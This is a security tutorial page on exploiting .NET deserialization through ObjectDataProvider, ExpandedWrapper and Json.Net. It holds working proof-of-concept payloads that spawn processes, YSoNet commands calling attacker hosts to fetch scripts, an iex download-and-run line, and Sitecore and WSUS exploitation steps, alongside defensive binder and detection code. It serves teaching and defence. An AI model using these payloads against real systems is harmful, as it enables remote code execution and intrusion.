Basic .NET deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

This post is dedicated to understanding how the ObjectDataProvider gadget is exploited to obtain RCE, and how the Json.Net and XmlSerializer serialization libraries can be abused with that gadget.

ObjectDataProvider Gadget

From the documentation: the ObjectDataProvider class wraps and creates an object that you can use as a binding source.
Yes, that is a strange explanation, so let's look at what this class actually has that is so interesting: this class allows wrapping an arbitrary object, using MethodParameters to set arbitrary parameters, and then using MethodName to call an arbitrary function of the wrapped object with those parameters.
Therefore, the object will execute a function with parameters while it is being deserialized.

How is this possible

The System.Windows.Data namespace, found inside PresentationFramework.dll at C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF, is where ObjectDataProvider is defined and implemented.

Using dnSpy you can inspect the code of the class we are interested in. In the image below we see the code of PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name

As you can see, when MethodName is set, base.Refresh() is called. Let's take a look at what it does:

Ok, let's continue and see what this.BeginQuery() does. BeginQuery is overridden by ObjectDataProvider and this is what it does:

Note that at the end of the code it calls this.QueryWorker(null). Let's see what that executes:

Note that this is not the complete code of the QueryWorker function, but it shows the interesting part: the code calls this.InvokeMethodOnInstance(out ex); this is the line where the configured method is invoked.

If you want to confirm that just by setting MethodName the method will be executed, you can run this code:

C# demo: ObjectDataProvider triggers Process.Start

```csharp
using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
    class Program
    {
        static void Main(string[] args)
        {
            ObjectDataProvider myODP = new ObjectDataProvider();
            // The type whose method will be invoked
            myODP.ObjectType = typeof(Process);
            // Arguments passed to the method, in order
            myODP.MethodParameters.Add("cmd.exe");
            myODP.MethodParameters.Add("/c calc.exe");
            // Setting MethodName triggers Refresh() -> BeginQuery() -> QueryWorker() -> InvokeMethodOnInstance()
            myODP.MethodName = "Start";
        }
    }
}
```

Note that you need to add C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll as a reference in order to load System.Windows.Data.

ExpandedWrapper

Using the previous exploit there will be cases where the object is going to be deserialized as an ObjectDataProvider instance (for example in the DotNetNuke vuln, using XmlSerializer, the object was deserialized using GetType). Then, there will be no knowledge of the object type that is wrapped in the ObjectDataProvider instance (Process, for example). You can find more information about the DotNetNuke vuln here.

This class allows specifying the object types of the objects that are encapsulated in a given instance. So, this class can be used to encapsulate a source object (ObjectDataProvider) into a new object type and provide the properties we need (ObjectDataProvider.MethodName and ObjectDataProvider.MethodParameters).
This is very useful for cases like the one presented before, because we will be able to wrap ObjectDataProvider inside an ExpandedWrapper instance, and when deserialized this class will create the ObjectDataProvider object that will execute the function indicated in MethodName.

You can check this wrapper with the following code:

C# demo: ExpandedWrapper encapsulating ObjectDataProvider

```csharp
using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
    class Program
    {
        static void Main(string[] args)
        {
            // The generic arguments declare the types wrapped inside the instance,
            // so a deserializer does not need to know them in advance
            ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
            myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
            myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
            myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
            myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
            myExpWrap.ProjectedProperty0.MethodName = "Start";
        }
    }
}
```

Json.Net

On the official web page it is stated that this library allows you to serialize and deserialize any .NET object with Json.NET's powerful JSON serializer. So, if we can deserialize the ObjectDataProvider gadget, we can cause RCE just by deserializing an object.

Json.Net example

First of all, let's look at an example of how to serialize/deserialize an object using this library:

C# demo: Json.NET serialize/deserialize

```csharp
using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
    public class Account
    {
        public string Email { get; set; }
        public bool Active { get; set; }
        public DateTime CreatedDate { get; set; }
        public IList<string> Roles { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            Account account = new Account
            {
                Email = "james@example.com",
                Active = true,
                CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
                Roles = new List<string>
                {
                    "User",
                    "Admin"
                }
            };

            // Serialize the object and print it
            string json = JsonConvert.SerializeObject(account);
            Console.WriteLine(json);
            // {"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

            // Deserialize it
            Account desaccount = JsonConvert.DeserializeObject<Account>(json);
            Console.WriteLine(desaccount.Email);
        }
    }
}
```

Abusing Json.Net

Using ysoserial.net I created the exploit:

```text
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c calc.exe']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```

With this code you can test the exploit: just run it and you will see that a calc is executed:

C# demo: Json.NET ObjectDataProvider exploitation PoC

```csharp
using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
    class Program
    {
        static void Main(string[] args)
        {
            // Declare exploit
            string userdata = @"{
                '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
                'MethodName':'Start',
                'MethodParameters':{
                    '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
                    '$values':['cmd', '/c calc.exe']
                },
                'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
            }";
            // Exploit to base64
            string userdata_b64 = Convert.ToBase64String(Encoding.UTF8.GetBytes(userdata));

            // Get data from base64
            byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
            // Deserialize data
            string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
            object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
            {
                TypeNameHandling = TypeNameHandling.Auto
            });
        }
    }
}
```

Advanced .NET Gadget Chains (YSoNet & ysoserial.net)

The ObjectDataProvider + ExpandedWrapper technique introduced above is only one of MANY gadget chains that can be abused when an application performs unsafe .NET deserialization. Modern red-team tooling such as YSoNet (and the older ysoserial.net) automate the creation of ready-to-use malicious object graphs for dozens of gadgets and serialization formats.

Below is a condensed reference of the most important chains shipped with YSoNet, together with a short explanation of how each works and example commands to generate the payloads.

| Gadget Chain | Key Idea / Primitive | Common Serializers | YSoNet one-liner |
|---|---|---|---|
| TypeConfuseDelegate | Corrupts the DelegateSerializationHolder record so that, once materialised, the delegate points to any attacker-supplied method (e.g. Process.Start) | BinaryFormatter, SoapFormatter, NetDataContractSerializer | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| ActivitySurrogateSelector | Abuses System.Workflow.ComponentModel.ActivitySurrogateSelector to bypass the .NET ≥4.8 type filtering and directly invoke the constructor of a supplied class or compile a C# file on the fly | BinaryFormatter, NetDataContractSerializer, LosFormatter | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| DataSetOldBehaviour | Leverages the legacy XML representation of System.Data.DataSet to instantiate arbitrary types by filling the `<ColumnMapping>` / `<DataType>` fields (optionally spoofing the assembly with --spoofedAssembly) | LosFormatter, BinaryFormatter, XmlSerializer | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| GetterCompilerResults | On WPF-enabled runtimes (> .NET 5) chains property getters until it reaches System.CodeDom.Compiler.CompilerResults, then compiles or loads a DLL supplied with -c | Json.NET typeless, MessagePack typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| ObjectDataProvider (review) | Uses WPF System.Windows.Data.ObjectDataProvider to call an arbitrary static method with controlled arguments. YSoNet adds a convenient --xamlurl variant to host the malicious XAML remotely | BinaryFormatter, Json.NET, XAML, etc. | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| PSObject (CVE-2017-8565) | Embeds a ScriptBlock in a System.Management.Automation.PSObject that executes when PowerShell deserializes it | PowerShell remoting, BinaryFormatter | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |

tip

All payloads are written to stdout by default, which makes it trivial to pipe them into other tooling (e.g. ViewState generators, base64 encoders, HTTP clients).

Building / Installing YSoNet

If no pre-compiled binaries are available under Actions ➜ Artifacts / Releases, the following PowerShell one-liner will set up a build environment, clone the repository and compile everything in Release mode:

```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'));
choco install visualstudio2022community visualstudio2022-workload-nativedesktop msbuild.communitytasks nuget.commandline git --yes;

git clone https://github.com/irsdl/ysonet
cd ysonet
nuget restore ysonet.sln
msbuild ysonet.sln -p:Configuration=Release
```

The compiled ysonet.exe can then be found under ysonet/bin/Release/.

Real-world sink: Sitecore convertToRuntimeHtml → BinaryFormatter

A practical .NET sink reachable in authenticated Sitecore XP Content Editor flows:

  • Sink API: Sitecore.Convert.Base64ToObject(string) wraps new BinaryFormatter().Deserialize(...).
  • Trigger path: the convertToRuntimeHtml pipeline step ConvertWebControls, which looks for a sibling element with id="{iframeId}_inner" and reads its value attribute, treating it as base64-encoded serialized data. The result is cast to string and inserted into the HTML.

HTTP flow to reach the authenticated Sitecore sink:

```text
// Load HTML into EditHtml session
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
Content-Type: application/x-www-form-urlencoded

__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
<html>
<iframe id="test" src="poc"></iframe>
<dummy id="test_inner" value="BASE64_BINARYFORMATTER"></dummy>
</html>

// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
```

  • Gadget: any BinaryFormatter chain that returns a string (side-effects run during deserialization). See YSoNet/ysoserial.net to generate payloads.

For a full chain that starts pre-auth with HTML cache poisoning in Sitecore and leads to this sink, see the Sitecore page:

Sitecore
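The Sitecore sink above (and the BinaryFormatter/SoapFormatter sinks in the WSUS case below) share one root cause: a base64 blob from the request is handed to BinaryFormatter with no restriction on which types it may instantiate. As an added example that is not Sitecore's or YSoNet's code, the following C# shows two defensive checks a practitioner can apply to a Base64ToObject-style helper that only ever expects a plain string: a cheap pre-check that recognises the BinaryFormatter (MS-NRBF) stream header inside base64 input, usable in WAF rules or request logging, and a deny-all SerializationBinder that aborts deserialization before any class type is instantiated. The names BinaryFormatterGuard, LooksLikeBinaryFormatter, Base64ToString and DenyAllBinder are this example's own; it targets .NET Framework, where BinaryFormatter is still enabled (on .NET 5+ the formatter is disabled by default and should stay that way).

```csharp
// Added example (not Sitecore's code): defensive checks for a Base64ToObject-style sink.
using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

public static class BinaryFormatterGuard
{
    // SerializationHeaderRecord of an MS-NRBF stream: RecordType 0, RootId 1, HeaderId -1,
    // MajorVersion 1, MinorVersion 0. Every BinaryFormatter payload starts with these 17 bytes
    // (base64 prefix "AAEAAAD/////AQAAAAAAAAA").
    private static readonly byte[] NrbfHeader =
    {
        0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
        0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    };

    // True when the base64 string decodes to something that starts like a BinaryFormatter stream.
    public static bool LooksLikeBinaryFormatter(string base64)
    {
        byte[] data;
        try { data = Convert.FromBase64String(base64); }
        catch (FormatException) { return false; }
        if (data.Length < NrbfHeader.Length) return false;
        for (int i = 0; i < NrbfHeader.Length; i++)
            if (data[i] != NrbfHeader[i]) return false;
        return true;
    }

    // Binder that refuses every class type. It must throw rather than return null:
    // BinaryFormatter treats a null result as "fall back to default type resolution".
    private sealed class DenyAllBinder : SerializationBinder
    {
        public override Type BindToType(string assemblyName, string typeName)
        {
            throw new SerializationException(
                "Refusing to deserialize type '" + typeName + "' from assembly '" + assemblyName + "'");
        }
    }

    // Replacement for a Base64ToObject-style helper whose only legitimate payload is a string.
    // A root string is stored as a BinaryObjectString record, which carries no class information
    // and never reaches the binder; any class record (i.e. any gadget) does, and is rejected.
    public static string Base64ToString(string base64)
    {
        byte[] data = Convert.FromBase64String(base64);
        var formatter = new BinaryFormatter { Binder = new DenyAllBinder() };
        using (var ms = new MemoryStream(data))
        {
            object o = formatter.Deserialize(ms);
            return o as string ?? throw new SerializationException("Expected a string payload");
        }
    }

    public static void Main()
    {
        // Constructed sample: a harmless root string serialized with BinaryFormatter.
        string benign;
        using (var ms = new MemoryStream())
        {
            new BinaryFormatter().Serialize(ms, "hello");
            benign = Convert.ToBase64String(ms.ToArray());
        }
        Console.WriteLine("benign is NRBF: " + LooksLikeBinaryFormatter(benign));
        Console.WriteLine("plain text is NRBF: " + LooksLikeBinaryFormatter("aGVsbG8="));
        Console.WriteLine("decoded: " + Base64ToString(benign));

        // Constructed sample: a serialized class instance (System.Version) standing in for a gadget;
        // the binder sees a class record and throws before the object is built.
        string classPayload;
        using (var ms = new MemoryStream())
        {
            new BinaryFormatter().Serialize(ms, new Version(1, 2));
            classPayload = Convert.ToBase64String(ms.ToArray());
        }
        try { Base64ToString(classPayload); }
        catch (SerializationException ex) { Console.WriteLine("Blocked: " + ex.Message); }
    }
}
```

The header check is a detection aid, not a control: an attacker-supplied blob that is not NRBF is still untrusted input. The binder is the control, and the same pattern (throw on every type you did not explicitly expect) applies to SoapFormatter, which exposes the same Binder property.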

Case study: WSUS unsafe .NET deserialization (CVE-2025-59287)

  • Product/role: Windows Server Update Services (WSUS) role on Windows Server 2012 → 2025.
  • Attack surface: IIS-hosted WSUS endpoints over HTTP/HTTPS on TCP 8530/8531 (often exposed internally; Internet exposure is high risk).
  • Root cause: Unauthenticated deserialization of attacker-controlled data using legacy formatters:
  • The GetCookie() endpoint deserializes an AuthorizationCookie using BinaryFormatter.
  • ReportingWebService performs unsafe deserialization via SoapFormatter.
  • Impact: A crafted serialized object triggers a gadget chain during deserialization, leading to arbitrary code execution as NT AUTHORITY\SYSTEM under the WSUS service (wsusservice.exe) or the IIS app pool wsuspool (w3wp.exe).

Practical exploitation notes

  • Discovery: Scan for WSUS on TCP 8530/8531. Treat any pre-auth serialized blob reaching WSUS web methods as a potential sink for BinaryFormatter/SoapFormatter payloads.
  • Payloads: Use YSoNet/ysoserial.net to generate BinaryFormatter or SoapFormatter chains (e.g. TypeConfuseDelegate, ActivitySurrogateSelector, ObjectDataProvider).
  • Expected process lineage on success:
  • wsusservice.exe -> cmd.exe -> cmd.exe -> powershell.exe
  • w3wp.exe (wsuspool) -> cmd.exe -> cmd.exe -> powershell.exe
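The process lineage listed above is the most reliable host-side signal for this class of bug: neither wsusservice.exe nor the wsuspool worker process has any business spawning a shell. As an added example that is not part of the advisory, the following C# walks a set of process-creation events (Sysmon Event ID 1 style fields: PID, parent PID, image name) and reports every cmd.exe/PowerShell process that has a WSUS host anywhere in its ancestry. The events are constructed for the example, and the names ProcessEvent, WsusLineageDetector and FindSuspiciousChains are this example's own.

```csharp
// Added example (constructed data, not from the advisory): detecting the WSUS lineage above.
using System;
using System.Collections.Generic;
using System.Linq;

public class ProcessEvent
{
    public int Pid;
    public int ParentPid;
    public string Image;   // file name only, lower-case (strip the path from Sysmon's Image field)
}

public static class WsusLineageDetector
{
    // Processes that host WSUS code; a shell or PowerShell under one of these is suspicious.
    private static readonly HashSet<string> WsusHosts = new HashSet<string> { "wsusservice.exe", "w3wp.exe" };
    private static readonly HashSet<string> Shells = new HashSet<string> { "cmd.exe", "powershell.exe", "pwsh.exe" };

    // Returns one "host -> ... -> shell" chain per shell process that descends from a WSUS host.
    // Shells that merely parent another shell are skipped so each chain is reported once, in full.
    public static List<string> FindSuspiciousChains(IEnumerable<ProcessEvent> events)
    {
        var byPid = events.ToDictionary(e => e.Pid);
        var shellParents = new HashSet<int>(
            byPid.Values.Where(e => Shells.Contains(e.Image)).Select(e => e.ParentPid));
        var hits = new List<string>();

        foreach (var leaf in byPid.Values.Where(e => Shells.Contains(e.Image) && !shellParents.Contains(e.Pid)))
        {
            var chain = new List<string> { leaf.Image };
            var cur = leaf;
            var seen = new HashSet<int> { cur.Pid };   // guard against PID-reuse cycles in the data
            while (byPid.TryGetValue(cur.ParentPid, out var parent) && seen.Add(parent.Pid))
            {
                chain.Insert(0, parent.Image);
                if (WsusHosts.Contains(parent.Image))
                {
                    hits.Add(string.Join(" -> ", chain));
                    break;
                }
                cur = parent;
            }
        }
        return hits;
    }

    public static void Main()
    {
        // Constructed events modelled on the lineage in the notes above, plus a benign user shell.
        var sample = new List<ProcessEvent>
        {
            new ProcessEvent { Pid = 100, ParentPid = 1,   Image = "services.exe" },
            new ProcessEvent { Pid = 200, ParentPid = 100, Image = "wsusservice.exe" },
            new ProcessEvent { Pid = 201, ParentPid = 200, Image = "cmd.exe" },
            new ProcessEvent { Pid = 202, ParentPid = 201, Image = "cmd.exe" },
            new ProcessEvent { Pid = 203, ParentPid = 202, Image = "powershell.exe" },
            new ProcessEvent { Pid = 300, ParentPid = 1,   Image = "explorer.exe" },
            new ProcessEvent { Pid = 301, ParentPid = 300, Image = "powershell.exe" },
        };

        foreach (var hit in FindSuspiciousChains(sample))
            Console.WriteLine("ALERT: " + hit);
    }
}
```

Run against the constructed sample, only the wsusservice.exe chain is reported; the powershell.exe under explorer.exe never reaches a WSUS host and stays silent. In production the same walk is cheap to express as a SIEM rule keyed on ParentImage, but the ancestry walk matters because the shell of interest is two hops below the host, not a direct child.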
